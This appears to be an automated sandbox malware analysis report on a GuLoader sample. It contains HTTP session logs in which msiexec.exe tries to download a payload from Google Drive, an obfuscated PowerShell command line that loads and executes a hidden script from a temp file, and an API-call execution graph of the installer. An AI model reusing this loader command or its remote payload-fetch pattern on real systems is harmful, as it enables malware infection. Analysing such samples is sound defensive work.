                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              71192.168.2.849780172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:13 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:14 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC4PBI66ARl4aJKaGefMJ_PHjQ9MB8y-iH37QoOTLHvGr8Du0r0BnjJ2rDI5PTroErrXCf6aXTI
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:13 GMT
                                                              Content-Security-Policy: script-src 'nonce-wb0DFSVoOu-se2kCgfI-wA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 48 44 58 41 47 41 52 58 7a 5a 6f 52 74 39 77 53 78 71 6e 79 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WHDXAGARXzZoRt9wSxqnyA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              72192.168.2.849781216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:14 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:15 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:15 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-N2R8-UTTjECyrSgbxPYDxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              73192.168.2.849782172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:03:15 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:03:16 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQjhCxz4CKte9yQ-Z2gINnO46n2F2S1ddsHOre1OHL0AXygekP-wpwTFQpvHuqCVwtF
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:03:16 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: script-src 'nonce-n2daCCKKUbSM_DwFGkO4GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:03:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 30 37 68 77 75 36 38 6e 64 6e 4a 62 47 73 65 59 72 72 41 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="x07hwu68ndnJbGseYrrAUQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:18:01:08
                                                              Start date:10/01/2025
                                                              Path:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\TVPfW4WUdj.exe"
                                                              Imagebase:0x400000
                                                              File size:859'801 bytes
                                                              MD5 hash:5DEC892FCAF6F21AC6780C69F631F82C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:18:01:15
                                                              Start date:10/01/2025
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"powershell.exe" -windowstyle minimized "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.SubString(50063,3);.$Karikeringerne78($Filicoid)"
                                                              Imagebase:0x7b0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1781252589.000000000A374000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:18:01:15
                                                              Start date:10/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:18:01:45
                                                              Start date:10/01/2025
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                              Imagebase:0x720000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2661194576.00000000047B4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:22.1%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:20.8%
                                                                Total number of Nodes:1356
                                                                Total number of Limit Nodes:32
                                                                execution_graph 3167 4015c1 3187 402c41 3167->3187 3171 401631 3173 401663 3171->3173 3174 401636 3171->3174 3176 401423 24 API calls 3173->3176 3203 401423 3174->3203 3185 40165b 3176->3185 3181 40164a SetCurrentDirectoryW 3181->3185 3182 4015d1 3182->3171 3183 401617 GetFileAttributesW 3182->3183 3184 4015fa 3182->3184 3199 405b86 3182->3199 3207 405855 3182->3207 3215 405838 CreateDirectoryW 3182->3215 3183->3182 3184->3182 3210 4057bb CreateDirectoryW 3184->3210 3188 402c4d 3187->3188 3218 4062a6 3188->3218 3191 4015c8 3193 405c04 CharNextW CharNextW 3191->3193 3194 405c21 3193->3194 3197 405c33 3193->3197 3196 405c2e CharNextW 3194->3196 3194->3197 3195 405c57 3195->3182 3196->3195 3197->3195 3198 405b86 CharNextW 3197->3198 3198->3197 3200 405b8c 3199->3200 3201 405ba2 3200->3201 3202 405b93 CharNextW 3200->3202 3201->3182 3202->3200 3256 4052ec 3203->3256 3206 406284 lstrcpynW 3206->3181 3267 40665e GetModuleHandleA 3207->3267 3211 405808 3210->3211 3212 40580c GetLastError 3210->3212 3211->3184 3212->3211 3213 40581b SetFileSecurityW 3212->3213 3213->3211 3214 405831 GetLastError 3213->3214 3214->3211 3216 405848 3215->3216 3217 40584c GetLastError 3215->3217 3216->3182 3217->3216 3234 4062b3 3218->3234 3219 4064fe 3220 402c6e 3219->3220 3251 406284 lstrcpynW 3219->3251 3220->3191 3235 406518 3220->3235 3222 4064cc lstrlenW 3222->3234 3224 4062a6 10 API calls 3224->3222 3227 4063e1 GetSystemDirectoryW 3227->3234 3228 4063f4 GetWindowsDirectoryW 3228->3234 3229 406518 5 API calls 3229->3234 3230 4062a6 10 API calls 3230->3234 3231 40646f lstrcatW 3231->3234 3232 406428 SHGetSpecialFolderLocation 3233 406440 SHGetPathFromIDListW CoTaskMemFree 3232->3233 3232->3234 3233->3234 3234->3219 3234->3222 3234->3224 3234->3227 3234->3228 3234->3229 3234->3230 3234->3231 3234->3232 3244 406152 3234->3244 3249 4061cb wsprintfW 3234->3249 3250 406284 lstrcpynW 3234->3250 3242 406525 3235->3242 3236 4065a0 CharPrevW 3239 40659b 3236->3239 3237 40658e CharNextW 3237->3239 3237->3242 3238 405b86 CharNextW 3238->3242 3239->3236 3240 4065c1 3239->3240 3240->3191 3241 40657a CharNextW 3241->3242 3242->3237 3242->3238 3242->3239 3242->3241 3243 406589 CharNextW 3242->3243 3243->3237 3252 4060f1 3244->3252 3247 4061b6 3247->3234 3248 406186 RegQueryValueExW RegCloseKey 3248->3247 3249->3234 3250->3234 3251->3220 3253 406100 3252->3253 3254 406104 3253->3254 3255 406109 RegOpenKeyExW 3253->3255 3254->3247 3254->3248 3255->3254 3258 405307 3256->3258 3266 401431 3256->3266 3257 405323 lstrlenW 3260 405331 lstrlenW 3257->3260 3261 40534c 3257->3261 3258->3257 3259 4062a6 17 API calls 3258->3259 3259->3257 3262 405343 lstrcatW 3260->3262 3260->3266 3263 405352 SetWindowTextW 3261->3263 3264 40535f 3261->3264 3262->3261 3263->3264 3265 405365 SendMessageW SendMessageW SendMessageW 3264->3265 3264->3266 3265->3266 3266->3206 3268 406684 GetProcAddress 3267->3268 3269 40667a 3267->3269 3270 40585c 3268->3270 3273 4065ee GetSystemDirectoryW 3269->3273 3270->3182 3272 406680 3272->3268 3272->3270 3274 406610 wsprintfW LoadLibraryExW 3273->3274 3274->3272 4051 404a42 4052 404a52 4051->4052 4053 404a6e 4051->4053 4062 4058ce GetDlgItemTextW 4052->4062 4055 404aa1 4053->4055 4056 404a74 SHGetPathFromIDListW 4053->4056 4058 404a8b SendMessageW 4056->4058 4059 404a84 4056->4059 4057 404a5f SendMessageW 4057->4053 4058->4055 4060 40140b 2 API calls 4059->4060 4060->4058 4062->4057 4070 406fc4 4072 406812 4070->4072 4071 40717d 4072->4071 4072->4072 4073 406893 GlobalFree 4072->4073 4074 40689c GlobalAlloc 4072->4074 4075 406913 GlobalAlloc 4072->4075 4076 40690a GlobalFree 4072->4076 4073->4074 4074->4071 4074->4072 4075->4071 4075->4072 4076->4075 4077 401e49 4078 402c1f 17 API calls 4077->4078 4079 401e4f 4078->4079 4080 402c1f 17 API calls 4079->4080 4081 401e5b 4080->4081 4082 401e72 EnableWindow 4081->4082 4083 401e67 ShowWindow 4081->4083 4084 402ac5 4082->4084 4083->4084 4085 40264a 4086 402c1f 17 API calls 4085->4086 4088 402659 4086->4088 4087 402796 4088->4087 4089 4026a3 ReadFile 4088->4089 4090 405dfd ReadFile 4088->4090 4092 4026e3 MultiByteToWideChar 4088->4092 4093 402798 4088->4093 4095 402709 SetFilePointer MultiByteToWideChar 4088->4095 4096 4027a9 4088->4096 4098 405e5b SetFilePointer 4088->4098 4089->4087 4089->4088 4090->4088 4092->4088 4107 4061cb wsprintfW 4093->4107 4095->4088 4096->4087 4097 4027ca SetFilePointer 4096->4097 4097->4087 4099 405e77 4098->4099 4106 405e8f 4098->4106 4100 405dfd ReadFile 4099->4100 4101 405e83 4100->4101 4102 405ec0 SetFilePointer 4101->4102 4103 405e98 SetFilePointer 4101->4103 4101->4106 4102->4106 4103->4102 4104 405ea3 4103->4104 4105 405e2c WriteFile 4104->4105 4105->4106 4106->4088 4107->4087 3505 4014cb 3506 4052ec 24 API calls 3505->3506 3507 4014d2 3506->3507 4115 4016cc 4116 402c41 17 API calls 4115->4116 4117 4016d2 GetFullPathNameW 4116->4117 4120 4016ec 4117->4120 4124 40170e 4117->4124 4118 401723 GetShortPathNameW 4119 402ac5 4118->4119 4121 4065c7 2 API calls 4120->4121 4120->4124 4122 4016fe 4121->4122 4122->4124 4125 406284 lstrcpynW 4122->4125 4124->4118 4124->4119 4125->4124 3581 40234e 3582 402c41 17 API calls 3581->3582 3583 40235d 3582->3583 3584 402c41 17 API calls 3583->3584 3585 402366 3584->3585 3586 402c41 17 API calls 3585->3586 3587 402370 GetPrivateProfileStringW 3586->3587 4126 401b53 4127 402c41 17 API calls 4126->4127 4128 401b5a 4127->4128 4129 402c1f 17 API calls 4128->4129 4130 401b63 wsprintfW 4129->4130 4131 402ac5 4130->4131 4132 401956 4133 402c41 17 API calls 4132->4133 4134 40195d lstrlenW 4133->4134 4135 402592 4134->4135 4136 4014d7 4137 402c1f 17 API calls 4136->4137 4138 4014dd Sleep 4137->4138 4140 402ac5 4138->4140 4141 401f58 4142 402c41 17 API calls 4141->4142 4143 401f5f 4142->4143 4144 4065c7 2 API calls 4143->4144 4145 401f65 4144->4145 4147 401f76 4145->4147 4148 4061cb wsprintfW 4145->4148 4148->4147 3709 403359 SetErrorMode GetVersion 3710 403398 3709->3710 3711 40339e 3709->3711 3712 40665e 5 API calls 3710->3712 3713 4065ee 3 API calls 3711->3713 3712->3711 3714 4033b4 lstrlenA 3713->3714 3714->3711 3715 4033c4 3714->3715 3716 40665e 5 API calls 3715->3716 3717 4033cb 3716->3717 3718 40665e 5 API calls 3717->3718 3719 4033d2 3718->3719 3720 40665e 5 API calls 3719->3720 3721 4033de #17 OleInitialize SHGetFileInfoW 3720->3721 3799 406284 lstrcpynW 3721->3799 3724 40342a GetCommandLineW 3800 406284 lstrcpynW 3724->3800 3726 40343c 3727 405b86 CharNextW 3726->3727 3728 403461 CharNextW 3727->3728 3729 40358b GetTempPathW 3728->3729 3736 40347a 3728->3736 3801 403328 3729->3801 3731 4035a3 3732 4035a7 GetWindowsDirectoryW lstrcatW 3731->3732 3733 4035fd DeleteFileW 3731->3733 3737 403328 12 API calls 3732->3737 3811 402edd GetTickCount GetModuleFileNameW 3733->3811 3734 405b86 CharNextW 3734->3736 3736->3734 3741 403574 3736->3741 3744 403576 3736->3744 3739 4035c3 3737->3739 3738 403611 3742 4036b4 3738->3742 3747 405b86 CharNextW 3738->3747 3795 4036c4 3738->3795 3739->3733 3740 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3739->3740 3745 403328 12 API calls 3740->3745 3741->3729 3839 403974 3742->3839 3895 406284 lstrcpynW 3744->3895 3746 4035f5 3745->3746 3746->3733 3746->3795 3764 403630 3747->3764 3751 4037fe 3753 403882 ExitProcess 3751->3753 3754 403806 GetCurrentProcess OpenProcessToken 3751->3754 3752 4036de 3755 4058ea MessageBoxIndirectW 3752->3755 3756 403852 3754->3756 3757 40381e LookupPrivilegeValueW AdjustTokenPrivileges 3754->3757 3761 4036ec ExitProcess 3755->3761 3763 40665e 5 API calls 3756->3763 3757->3756 3759 4036f4 3762 405855 5 API calls 3759->3762 3760 40368e 3896 405c61 3760->3896 3767 4036f9 lstrcatW 3762->3767 3768 403859 3763->3768 3764->3759 3764->3760 3769 403715 lstrcatW lstrcmpiW 3767->3769 3770 40370a lstrcatW 3767->3770 3771 40386e ExitWindowsEx 3768->3771 3774 40387b 3768->3774 3773 403731 3769->3773 3769->3795 3770->3769 3771->3753 3771->3774 3776 403736 3773->3776 3777 40373d 3773->3777 3778 40140b 2 API calls 3774->3778 3775 4036a9 3911 406284 lstrcpynW 3775->3911 3780 4057bb 4 API calls 3776->3780 3781 405838 2 API calls 3777->3781 3778->3753 3782 40373b 3780->3782 3783 403742 SetCurrentDirectoryW 3781->3783 3782->3783 3784 403752 3783->3784 3785 40375d 3783->3785 3919 406284 lstrcpynW 3784->3919 3920 406284 lstrcpynW 3785->3920 3788 4062a6 17 API calls 3789 40379c DeleteFileW 3788->3789 3790 4037a9 CopyFileW 3789->3790 3794 40376b 3789->3794 3790->3794 3791 4037f2 3793 40604a 36 API calls 3791->3793 3793->3795 3794->3788 3794->3791 3796 4062a6 17 API calls 3794->3796 3797 40586d 2 API calls 3794->3797 3798 4037dd CloseHandle 3794->3798 3921 40604a MoveFileExW 3794->3921 3912 40389a 3795->3912 3796->3794 3797->3794 3798->3794 3799->3724 3800->3726 3802 406518 5 API calls 3801->3802 3803 403334 3802->3803 3804 40333e 3803->3804 3805 405b59 3 API calls 3803->3805 3804->3731 3806 403346 3805->3806 3807 405838 2 API calls 3806->3807 3808 40334c 3807->3808 3925 405da9 3808->3925 3929 405d7a GetFileAttributesW CreateFileW 3811->3929 3813 402f1d 3832 402f2d 3813->3832 3930 406284 lstrcpynW 3813->3930 3815 402f43 3931 405ba5 lstrlenW 3815->3931 3819 402f54 GetFileSize 3820 403050 3819->3820 3838 402f6b 3819->3838 3936 402e79 3820->3936 3822 403059 3824 403089 GlobalAlloc 3822->3824 3822->3832 3948 403311 SetFilePointer 3822->3948 3823 4032fb ReadFile 3823->3838 3947 403311 SetFilePointer 3824->3947 3825 4030bc 3829 402e79 6 API calls 3825->3829 3828 4030a4 3831 403116 35 API calls 3828->3831 3829->3832 3830 403072 3833 4032fb ReadFile 3830->3833 3836 4030b0 3831->3836 3832->3738 3835 40307d 3833->3835 3834 402e79 6 API calls 3834->3838 3835->3824 3835->3832 3836->3832 3836->3836 3837 4030ed SetFilePointer 3836->3837 3837->3832 3838->3820 3838->3823 3838->3825 3838->3832 3838->3834 3840 40665e 5 API calls 3839->3840 3841 403988 3840->3841 3842 4039a0 3841->3842 3843 40398e 3841->3843 3844 406152 3 API calls 3842->3844 3957 4061cb wsprintfW 3843->3957 3845 4039d0 3844->3845 3846 4039ef lstrcatW 3845->3846 3848 406152 3 API calls 3845->3848 3849 40399e 3846->3849 3848->3846 3949 403c4a 3849->3949 3852 405c61 18 API calls 3853 403a21 3852->3853 3854 403ab5 3853->3854 3856 406152 3 API calls 3853->3856 3855 405c61 18 API calls 3854->3855 3857 403abb 3855->3857 3858 403a53 3856->3858 3859 403acb LoadImageW 3857->3859 3862 4062a6 17 API calls 3857->3862 3858->3854 3866 403a74 lstrlenW 3858->3866 3870 405b86 CharNextW 3858->3870 3860 403b71 3859->3860 3861 403af2 RegisterClassW 3859->3861 3865 40140b 2 API calls 3860->3865 3863 403b7b 3861->3863 3864 403b28 SystemParametersInfoW CreateWindowExW 3861->3864 3862->3859 3863->3795 3864->3860 3869 403b77 3865->3869 3867 403a82 lstrcmpiW 3866->3867 3868 403aa8 3866->3868 3867->3868 3871 403a92 GetFileAttributesW 3867->3871 3872 405b59 3 API calls 3868->3872 3869->3863 3875 403c4a 18 API calls 3869->3875 3873 403a71 3870->3873 3874 403a9e 3871->3874 3876 403aae 3872->3876 3873->3866 3874->3868 3877 405ba5 2 API calls 3874->3877 3878 403b88 3875->3878 3958 406284 lstrcpynW 3876->3958 3877->3868 3880 403b94 ShowWindow 3878->3880 3881 403c17 3878->3881 3883 4065ee 3 API calls 3880->3883 3882 4053bf 5 API calls 3881->3882 3884 403c1d 3882->3884 3885 403bac 3883->3885 3886 403c21 3884->3886 3887 403c39 3884->3887 3888 403bba GetClassInfoW 3885->3888 3890 4065ee 3 API calls 3885->3890 3886->3863 3894 40140b 2 API calls 3886->3894 3889 40140b 2 API calls 